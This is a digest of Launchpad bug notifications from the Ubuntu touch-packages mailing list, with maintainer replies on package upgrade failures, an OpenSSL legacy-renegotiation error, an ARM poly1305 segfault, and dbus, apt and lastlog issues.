dpkg: error processing package libpam-runtime (--configure):
 installed libpam-runtime package post-installation script subprocess returned 
error exit status 255

Is pam missing a versioned pre-depends? or is something not prepared to
handle a non-interactive update?

Amit you can probably make progress by running this in a terminal: sudo
apt install -f

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1964561

Title:
  package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade:
  installed libpam-runtime package post-installation script subprocess
  returned error exit status 255

Status in pam package in Ubuntu:
  New

Bug description:
  I found this bug when I upgrade my ubuntu 20.04 LTS using command
  "apt-get upgrade"

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: libpam-runtime 1.3.1-5ubuntu4.3
  ProcVersionSignature: Ubuntu 5.13.0-35.40~20.04.1-generic 5.13.19
  Uname: Linux 5.13.0-35-generic x86_64
  NonfreeKernelModules: crc32_pclmul
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Fri Mar 11 10:43:38 2022
  ErrorMessage: installed libpam-runtime package post-installation script 
subprocess returned error exit status 255
  InstallationDate: Installed on 2022-03-10 (0 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 
(20210209.1)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.5, unpackaged
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: pam
  Title: package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade: 
installed libpam-runtime package post-installation script subprocess returned 
error exit status 255
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1964561/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1963751] Re: focal security update 2.34.6-0ubuntu0.20.04.1 cannot be automatically installed due to new dependency

2022-03-07 Thread Seth Arnold
Thanks for doing the digging to confirm the cause; I suspect unattended-
upgrades should be modified to perform something similar to apt upgrade,
rather than apt-get upgrade, and bring in new dependencies when
necessary. A lot of systems never have interactive users any more.

Thanks

** Changed in: unattended-upgrades (Ubuntu)
   Status: Incomplete => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unattended-upgrades in
Ubuntu.
https://bugs.launchpad.net/bugs/1963751

Title:
  focal security update 2.34.6-0ubuntu0.20.04.1 cannot be automatically
  installed due to new dependency

Status in unattended-upgrades package in Ubuntu:
  Confirmed

Bug description:
  Version: 2.34.6-0ubuntu0.20.04.1

  This security update for focal does not seem to be automatically
  upgradeable by unattended-upgrades:

  2022-03-05 14:32:35,653 WARNING package libwebkit2gtk-4.0-37 upgradable but 
fails to be marked for upgrade (E:Unable to correct problems, you have held 
broken packages.)
  2022-03-05 14:32:36,685 WARNING package libwebkit2gtk-4.0-37 upgradable but 
fails to be marked for upgrade (E:Unable to correct problems, you have held 
broken packages.)
  2022-03-05 14:32:38,031 INFO No packages found that can be upgraded 
unattended and no pending auto-removals
  2022-03-05 14:32:38,232 INFO Package libjavascriptcoregtk-4.0-18 is kept back 
because a related package is kept back or due to local apt_preferences(5).
  2022-03-05 14:32:38,382 INFO Package libwebkit2gtk-4.0-37 is kept back 
because a related package is kept back or due to local apt_preferences(5).

  apt-mark showhold lists no held packages, and there are no
  apt_preferences set. The actual cause seems to be an extra dependency
  on libopengl0 which has been added with the upgrade. Is this
  intentional?

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: libwebkit2gtk-4.0-37 2.34.6-0ubuntu0.20.04.1
  ProcVersionSignature: Ubuntu 5.4.0-100.113-generic 5.4.166
  Uname: Linux 5.4.0-100-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.21
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Sat Mar  5 14:39:24 2022
  InstallationDate: Installed on 2018-06-15 (1358 days ago)
  InstallationMedia: Xubuntu 18.04 LTS "Bionic Beaver" - Release amd64 
(20180426)
  ProcEnviron:
   TERM=screen.xterm-256color
   PATH=(custom, no user)
   LANG=en_GB.UTF-8
   SHELL=/bin/bash
  SourcePackage: webkit2gtk
  UpgradeStatus: Upgraded to focal on 2021-05-30 (278 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/unattended-upgrades/+bug/1963751/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1963834] Re: openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

2022-03-07 Thread Seth Arnold
It looks like this was added in:

https://github.com/openssl/openssl/commit/72d2670bd21becfa6a64bb03fa55ad82d6d0c0f3

in order to address servers that have not yet been updated for
CVE-2009-3555.

It's possible to add a flag at the C level to connect insecurely,
SSL_OP_LEGACY_SERVER_CONNECT, but I don't see this added to python:

https://bugs.python.org/issue44888
https://github.com/python/cpython/pull/27776

Thus it might not be easily reachable from Python programs.

Best would be to update the remote server to address CVE-2009-3555 (it
might also be known as "support RFC 5746"). I'm not sure what to suggest
for programs written in Python.

Thanks

** Bug watch added: Python Roundup #44888
   http://bugs.python.org/issue44888

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3555

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1963834

Title:
  openssl 3.0 - SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED]

Status in openssl package in Ubuntu:
  New

Bug description:
  Description:Ubuntu Jammy Jellyfish (development branch)
  Release:22.04

  openssl:
Installé : 3.0.1-0ubuntu1
Candidat : 3.0.1-0ubuntu1
   Table de version :
   *** 3.0.1-0ubuntu1 500
  500 http://ca.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
  100 /var/lib/dpkg/status

  Using Ubuntu 22.04, I now get the following error message when
  attempting to connect to our office VPN using "gp-saml-gui
  (https://github.com/dlenski/gp-saml-gui)" :

  #
  dominique@Doombuntu:~$ .local/bin/gp-saml-gui  server_url
  Looking for SAML auth tags in response to 
https://server_url/global-protect/prelogin.esp...
  usage: gp-saml-gui [-h] [--no-verify] [-C COOKIES | -K] [-g | -p] [-c CERT] 
[--key KEY] [-v | -q] [-x | -P | -S] [-u] [--clientos {Windows,Linux,Mac}] [-f 
EXTRA] server [openconnect_extra ...]
  gp-saml-gui: error: SSL error: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] 
unsafe legacy renegotiation disabled (_ssl.c:997)
  #
  #
  #

  gp-saml-gui uses python module requests.
  Using python ide, I can get the same results  :

  #
  >>> r = requests.get('https://server_url')
  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 699, 
in urlopen
  httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 382, 
in _make_request
  self._validate_conn(conn)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 1012, 
in _validate_conn
  conn.connect()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 411, in 
connect
  self.sock = ssl_wrap_socket(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 449, in 
ssl_wrap_socket
  ssl_sock = _ssl_wrap_socket_impl(
File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 493, in 
_ssl_wrap_socket_impl
  return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
File "/usr/lib/python3.10/ssl.py", line 512, in wrap_socket
  return self.sslsocket_class._create(
File "/usr/lib/python3.10/ssl.py", line 1070, in _create
  self.do_handshake()
File "/usr/lib/python3.10/ssl.py", line 1341, in do_handshake
  self._sslobj.do_handshake()
  ssl.SSLError: [SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy 
renegotiation disabled (_ssl.c:997)

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in 
send
  resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 755, 
in urlopen
  retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 574, in 
increment
  raise MaxRetryError(_pool, url, error or ResponseError(cause))
  urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='server_url', 
port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, 
'[SSL: UNSAFE_LEGACY_RENEGOTIATION_DISABLED] unsafe legacy renegotiation 
disabled (_ssl.c:997)')))

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get
  return request('get', url, params=params, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request
  return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in 
request
  resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in 
send
  r = adapter.send(request, **kwargs)
File 

[Touch-packages] [Bug 1962036] Re: dbus was stopped during today's jammy update, breaking desktop

2022-02-23 Thread Seth Arnold
This reminds me a lot of https://bugs.launchpad.net/bugs/1871538

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1962036

Title:
  dbus was stopped during today's jammy update, breaking desktop

Status in dbus package in Ubuntu:
  New

Bug description:
  Impact: logind stopped, so desktop stopped, ssh stopped, got no getty.
  Had to hard reset.

  Today's jammy upgrade stopped dbus at 19:46:27

  Feb 23 19:46:27 jak-t480s systemd[1]: Stopping D-Bus System Message
  Bus...

  This should not happen. I don't know which package caused this, but
  presumably dbus should not be stoppable in the first place.


  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: dbus 1.12.20-2ubuntu3
  ProcVersionSignature: Ubuntu 5.15.0-22.22-generic 5.15.19
  Uname: Linux 5.15.0-22-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu78
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: GNOME
  Date: Wed Feb 23 20:03:41 2022
  InstallationDate: Installed on 2018-03-14 (1442 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Alpha amd64 (20180313)
  RebootRequiredPkgs: Error: path contained symlinks.
  SourcePackage: dbus
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1962036/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1960863] Re: armv8 paca: poly1305 users see segfaults when pointer authentication in use on AWS Graviton 3 instances

2022-02-16 Thread Seth Arnold
None of us are ARM architecture experts but the upstream code nearby
doesn't look like it's changed since this patch was introduced:

https://github.com/openssl/openssl/blame/master/crypto/poly1305/asm/poly1305-armv8.pl
https://github.com/openssl/openssl/blame/OpenSSL_1_1_1-stable/crypto/poly1305/asm/poly1305-armv8.pl
https://github.com/openssl/openssl/blame/openssl-3.0/crypto/poly1305/asm/poly1305-armv8.pl

The debdiff looks like it makes sense to me, and it all feels pretty
plausible.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1960863

Title:
  armv8 paca: poly1305 users see segfaults when pointer authentication
  in use on AWS Graviton 3 instances

Status in openssl package in Ubuntu:
  Fix Released
Status in openssl source package in Focal:
  In Progress

Bug description:
  [Impact]

  Support for hardware pointer authentication for armv8 systems was
  merged in openssl 1.1.1f, but it contains a bug in the implementation
  for poly1305 message authenticated code routines, which causes the
  calling program to fail pointer authentication, which causes the
  program to crash with a segmentation fault.

  You can easily test it by accessing any website that uses poly1305.
  There is no workaround except use a different MAC.

  [Testcase]

  This bug applies to armv8 systems which support pointer
  authentication. Start an armv8 instance, such as a c7g graviton 3
  instance on AWS, and make sure the paca flag is present in lscpu:

  $ grep paca /proc/cpuinfo
  Features : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp 
cpuid asimdrdm jscvt fcma lrcpc dcpop sha3 sm3 sm4 asimddp sha512 sve asimdfhm 
dit uscat ilrcpc flagm ssbs paca pacg dcpodp svei8mm svebf16 i8mm bf16 dgh rng

  Next, attempt to connect to any website that uses poly1305 MAC.

  $ curl https://services.gradle.org/distributions/gradle-7.2-bin.zip --output 
gradle-7.2.bin
  % Total % Received % Xferd Average Speed Time Time Time Current
  Dload Upload Total Spent Left Speed
  0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Segmentation fault (core dumped)

  There is a test package available in the following ppa:

  https://launchpad.net/~mruffell/+archive/ubuntu/sf327917-test

  Install it, and poly1305 operations will no longer segfault.

  [Where problems could occur]

  The patch changes the order of operations for loading the SP and
  checking the AUTIASP against it, from checking the AUTIASP against
  nothing then loading the correct SP to check with, to the correct
  loading the SP and then checking the AUTIASP against the SP.

  This only changes one code path for armv8 systems, and other
  architectures are not affected. This is also only limited to poly1305
  MAC.

  If a regression were to occur, it would only affect users of poly1035
  MAC on armv8 with pacs support.

  [Other info]

  The fix landed upstream in openssl 1.1.1i with the following commit:

  commit 5795acffd8706e1cb584284ee5bb3a30986d0e75
  Author: Ard Biesheuvel 
  Date:   Tue Oct 27 18:02:40 2020 +0100
  Subject: crypto/poly1305/asm: fix armv8 pointer authentication
  Link: 
https://github.com/openssl/openssl/commit/5795acffd8706e1cb584284ee5bb3a30986d0e75

  This commit is already present in Impish onward. Only Focal needs the
  fix.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1960863/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1960264] Re: 503 errors for Jammy PPAs

2022-02-11 Thread Seth Arnold
Are there any log entries in your proxy that might help explain what's
happening?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1960264

Title:
  503 errors for Jammy PPAs

Status in apt package in Ubuntu:
  New

Bug description:
  For Jammy - all PPAs seem to fail - the main archive is ok

   503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]
  Err:12 http://ppa.launchpad.net/ubuntubudgie-dev/budgie-extras-daily/ubuntu 
jammy/main amd64 budgie-window-shuffler amd64 1.3.0+202202062047~ubuntu22.04.1
    503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]
  Err:6 http://ppa.launchpad.net/ubuntubudgie-dev/budgie-extras-daily/ubuntu 
jammy/main amd64 budgie-rotation-lock-applet all 
1.3.0+202202062047~ubuntu22.04.1
    503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]
  Fetched 114 kB in 7s (15.8 kB/s)
  E: Failed to fetch 
http://ppa.launchpad.net/ubuntubudgie-dev/budgie-extras-daily/ubuntu/pool/main/b/budgie-extras/budgie-quicknote-applet_1.3.0%2b202202062047%7eubuntu22.04.1_amd64.deb
  503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]
  E: Failed to fetch 
http://ppa.launchpad.net/ubuntubudgie-dev/budgie-extras-daily/ubuntu/pool/main/b/budgie-extras/budgie-recentlyused-applet_1.3.0%2b202202062047%7eubuntu22.04.1_amd64.deb
  503  Connection closed, check DlMaxRetries [IP: 127.0.0.1 3142]

  ppa:ubuntubudgie-dev/budgie-extras-daily

  The same PPA for impish & focal work just fine

  Thoughts?

  

  Continually running repeatedly sudo apt update && sudo apt dist-
  upgrade -y eventually forces the downloads to occur ok and the
  upgrades can then be installed ok

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: apt 2.3.15
  ProcVersionSignature: Ubuntu 5.15.0-18.18-generic 5.15.12
  Uname: Linux 5.15.0-18-generic x86_64
  ApportVersion: 2.20.11-0ubuntu76
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: Budgie:GNOME
  Date: Mon Feb  7 18:47:47 2022
  InstallationDate: Installed on 2022-01-29 (8 days ago)
  InstallationMedia: Ubuntu-Budgie 22.04 LTS "Jammy Jellyfish" - Alpha amd64 
(20220129)
  SourcePackage: apt
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1960264/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1959160] Re: package systemd 245.4-4ubuntu3.11 failed to install/upgrade: no se pudieron copiar los datos extraídos de './bin/systemctl' a '/bin/systemctl.dpkg-new': fin de fiche

2022-01-27 Thread Seth Arnold
Thank you for taking the time to report this bug and helping to make
Ubuntu better.  Reviewing your dmesg attachment to this bug report it
seems that there may be a problem with your hardware.  I'd recommend
performing a back up and then investigating the situation.  Measures you
might take include checking cable connections and using software tools
to investigate the health of your hardware.  In the event that is is not
in fact an error with your hardware please set the bug's status back to
New.  Thanks and good luck!

** Changed in: systemd (Ubuntu)
   Status: New => Invalid

** Changed in: systemd (Ubuntu)
   Importance: Undecided => Low

** Tags added: hardware-error

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1959160

Title:
  package systemd 245.4-4ubuntu3.11 failed to install/upgrade: no se
  pudieron copiar los datos extraídos de './bin/systemctl' a
  '/bin/systemctl.dpkg-new': fin de fichero o de flujo inesperado

Status in systemd package in Ubuntu:
  Invalid

Bug description:
  I cant to use ubuntus store

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: systemd 245.4-4ubuntu3.11
  ProcVersionSignature: Ubuntu 5.13.0-27.29~20.04.1-generic 5.13.19
  Uname: Linux 5.13.0-27-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.18
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Jan 26 23:23:33 2022
  ErrorMessage: no se pudieron copiar los datos extraídos de './bin/systemctl' 
a '/bin/systemctl.dpkg-new': fin de fichero o de flujo inesperado
  InstallationDate: Installed on 2022-01-27 (0 days ago)
  InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819)
  MachineType: LENOVO 2466RA9
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.13.0-27-generic 
root=UUID=aeba2232-8f7b-4fcc-bc3a-7a15409cdcc0 ro quiet splash vt.handoff=7
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: systemd
  SystemdDelta:
   [EXTENDED]   /usr/lib/systemd/system/rc-local.service → 
/usr/lib/systemd/system/rc-local.service.d/debian.conf
   [EXTENDED]   /usr/lib/systemd/system/user@.service → 
/usr/lib/systemd/system/user@.service.d/timeout.conf
   
   2 overridden configuration files found.
  Title: package systemd 245.4-4ubuntu3.11 failed to install/upgrade: no se 
pudieron copiar los datos extraídos de './bin/systemctl' a 
'/bin/systemctl.dpkg-new': fin de fichero o de flujo inesperado
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 09/18/2019
  dmi.bios.release: 2.76
  dmi.bios.vendor: LENOVO
  dmi.bios.version: G3ETB6WW(2.76)
  dmi.board.asset.tag: Not Available
  dmi.board.name: 2466RA9
  dmi.board.vendor: LENOVO
  dmi.board.version: Win8 Pro DPK TPG
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvrG3ETB6WW(2.76):bd09/18/2019:br2.76:svnLENOVO:pn2466RA9:pvrThinkPadL430:rvnLENOVO:rn2466RA9:rvrWin8ProDPKTPG:cvnLENOVO:ct10:cvrNotAvailable:skuLENOVO_MT_2466:
  dmi.product.family: ThinkPad L430
  dmi.product.name: 2466RA9
  dmi.product.sku: LENOVO_MT_2466
  dmi.product.version: ThinkPad L430
  dmi.sys.vendor: LENOVO

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1959160/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1273258] Re: Hundreds of dbus-daemon processes

2022-01-24 Thread Seth Arnold
Pavel, OMJ, maybe execsnoop-bpfcc from bpfcc-tools can help spot what
program is starting your dbus-daemons?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1273258

Title:
  Hundreds of dbus-daemon processes

Status in dbus package in Ubuntu:
  Confirmed

Bug description:
  I find a growing number of root owned dbus-daemon processes.
  Eventually, this results in a 'too many processes' error preventing something 
to fork, e.g. a login.

  They get created by batches of 4, every 30 minutes on my box.
  My box is a puppet client, so that these 30 minutes are not in a local cron 
tab.
  The pids are 11 units apart (when the box is otherwise idle).
  The command line is:
  //bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session

  ~# ps -fu root | grep dbus-daemon | grep -v grep | tail -8
  root 17509 1  0 11:25 ?00:00:00 //bin/dbus-daemon --fork 
--print-pid 4 --print-address 6 --session
  root 17520 1  0 11:25 ?00:00:00 //bin/dbus-daemon --fork 
--print-pid 4 --print-address 6 --session
  root 17531 1  0 11:25 ?00:00:00 //bin/dbus-daemon --fork 
--print-pid 4 --print-address 6 --session
  root 17542 1  0 11:25 ?00:00:00 //bin/dbus-daemon --fork 
--print-pid 4 --print-address 6 --session
  root 17972 1  0 11:55 ?00:00:00 //bin/dbus-daemon --fork 
--print-pid 4 --print-address 6 --session
  root 17983 1  0 11:55 ?00:00:00 //bin/dbus-daemon --fork 
--print-pid 4 --print-address 6 --session
  root 17994 1  0 11:55 ?00:00:00 //bin/dbus-daemon --fork 
--print-pid 4 --print-address 6 --session
  root 18005 1  0 11:55 ?00:00:00 //bin/dbus-daemon --fork 
--print-pid 4 --print-address 6 --session

  I reported this first to https://bugs.freedesktop.org/show_bug.cgi?id=74114
  and was told to report it to ubuntu instead.
  Here were some additional comments:

  The symptoms you described probably mean that something running as
  root is either running /usr/bin/dbus-launch, or attempting to access a
  D-Bus session via the autolaunch: transport while under a transient
  X11 session, 4 times every 30 minutes.

  If this machine does not intentionally run an X11 GUI or a D-Bus
  session, uninstalling the dbus-x11 package or making /usr/bin/dbus-
  launch non-executable might work around this. Don't do that if you use
  an X11 GUI environment, though.

  Since 1.4.8, dbus autolaunch has only been effective when DISPLAY is
  set and non-empty, so if this is autolaunch, an X11 session must be
  involved somehow.

  ProblemType: Bug
  DistroRelease: Ubuntu 12.04
  Package: dbus 1.4.18-1ubuntu1.4
  ProcVersionSignature: Ubuntu 3.2.0-58.88-generic 3.2.53
  Uname: Linux 3.2.0-58-generic x86_64
  NonfreeKernelModules: nvidia
  ApportVersion: 2.0.1-0ubuntu17.6
  Architecture: amd64
  Date: Mon Jan 27 14:51:19 2014
  MarkForUpload: True
  ProcEnviron:
   SHELL=/bin/bash
   PATH=(custom, no user)
   LANG=en_US.UTF-8
  SourcePackage: dbus
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1273258/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1668944] Re: The _apt user ignores group membership.

2022-01-20 Thread Seth Arnold
Changing away from 'nogroup' would be good, that's for NFS use (similar
to 'nobody').

Using ACLs to grant the _apt user permission to work with specific files
sounds good to me. Perhaps not all editors know to maintain those when
writing new files with the same name, or perhaps know to fall back to
non-atomic file update tools in order to maintain those...

But it'd be ideal from apt's perspective, and easier than trying to
manage supplementary groups in sandboxed processes.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1668944

Title:
  The _apt user ignores group membership.

Status in apt package in Ubuntu:
  Invalid

Bug description:
  Actually I had the same problem described in 
http://askubuntu.com/questions/773955/apt-get-ssl-client-certificate-not-working-on-16-04-error-while-reading-file
  I want to use client certificates with apt. But I don't want to make them 
world readable in order to make apt working. So I created a group 'ssl-cert' 
and changed the group ownership of the ssl cert files to match this group. I 
also added the _apt user to the ssl-cert group.

  Then I tried to open these files as user '_apt' in bash (su -s
  /bin/bash _apt) which works well.

  But if I run: "apt-get -o "Debug::Acquire::https=true" update" I still get 
the following error:
  * error reading ca cert file /etc/certs/mycert/ca.pem (Error while reading 
file.)
  * Closing connection 26

  So my guess is that apt somehow ignores the ssl-cert membership.

  Possible workarounds:
  - make ssl client cert world readable
  - change owner ssl client cert to _apt
  - change main group of _apt user from 'nogroup' to 'ssl-cert'
  - set APT::Sandbox::User "root"; in apt.conf.d

  Neither of them is pretty. 
  Maybe this is a wanted behavior, then just suggest how to fix the issue in 
nice way.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1668944/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1707645] Re: system with high numbered uids has huge sparse /var/log/lastlog

2022-01-06 Thread Seth Arnold
Oliver, from the lastlog(8) manpage:

   The lastlog file is a database which contains info on the
   last login of each user. You should not rotate it. It is a
   sparse file, so its size on the disk is usually much smaller
   than the one shown by "ls -l" (which can indicate a really
   big file if you have in passwd users with a high UID). You
   can display its real size with "ls -s".

http://manpages.ubuntu.com/manpages/focal/man8/lastlog.8.html

If you're using a filesystem that can't handle sparse files it might be
best to not use lastlog.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1707645

Title:
  system with high numbered uids has huge sparse /var/log/lastlog

Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed
Status in util-linux package in Ubuntu:
  Confirmed

Bug description:
  I was investigating the use of a single high UID user (ie, 20)
  and discovered that /var/log/lastlog grew to an enormously large
  sparse file:

  $ ls -lh /var/log/lastlog 
  -rw-rw-r-- 1 root utmp 544G Jul 27 12:35 /var/log/lastlog

  The file is actually quite small though:
  $ ls -lh --size /var/log/lastlog 
  56K -rw-rw-r-- 1 root utmp 544G Jul 27 12:35 /var/log/lastlog

  On a standalone system, this is possibly not a problem since it is
  highly unlikely that a system will have 2 billion users, but this is
  confirmed to wreak havoc on rsync backups.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1707645/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 288964] Re: sudo does not work with unbinding usb interface from usbhid driver

2021-12-14 Thread Seth Arnold
ALinuxUser, Xiaofan Chen's example was unbinding the usbhid driver via
the /sys/bus/usb/drivers/usbhid/unbind control file -- yours is using
/sys/bus/usb/drivers/usb/unbind instead. You probably have to use the
control file that corresponds to the driver your device is using. (Check
lsusb -t output.)

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/288964

Title:
  sudo does not work with unbinding usb interface from usbhid driver

Status in sudo package in Ubuntu:
  Invalid

Bug description:
  I was looking for a way to dump the HID report descriptor under Linux.
  For that purpose, I need to detach the kernel usbhid driver from the
  HID interfaces.

  More detail in libusb mailing list archive.
  
http://www.nabble.com/How-to-dump-HID-report-descriptor-under-Linux-td19609562.html

  mcuee@Ubuntu804:~$ uname -a
  Linux Ubuntu804 2.6.24-21-generic #1 SMP Mon Aug 25 17:32:09 UTC 2008 i686 
GNU/Linux

  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ lsusb
  Bus 001 Device 007: ID 04f2:0760 Chicony Electronics Co., Ltd
  Bus 001 Device 006: ID :0005
  Bus 001 Device 005: ID 046d:c054 Logitech, Inc.
  Bus 001 Device 004: ID 14c0:0008
  Bus 001 Device 003: ID 1947:0033
  Bus 001 Device 002: ID 058f:9360 Alcor Micro Corp. 8-in-1 Media Card Reader
  Bus 001 Device 001: ID :
  Bus 002 Device 001: ID :

  mcuee@Ubuntu804:/sys/bus/usb/drivers/usbhid$ ls
  1-3:1.0  1-5:1.0  1-7:1.0  1-7:1.1  bind  module  new_id  uevent  unbind

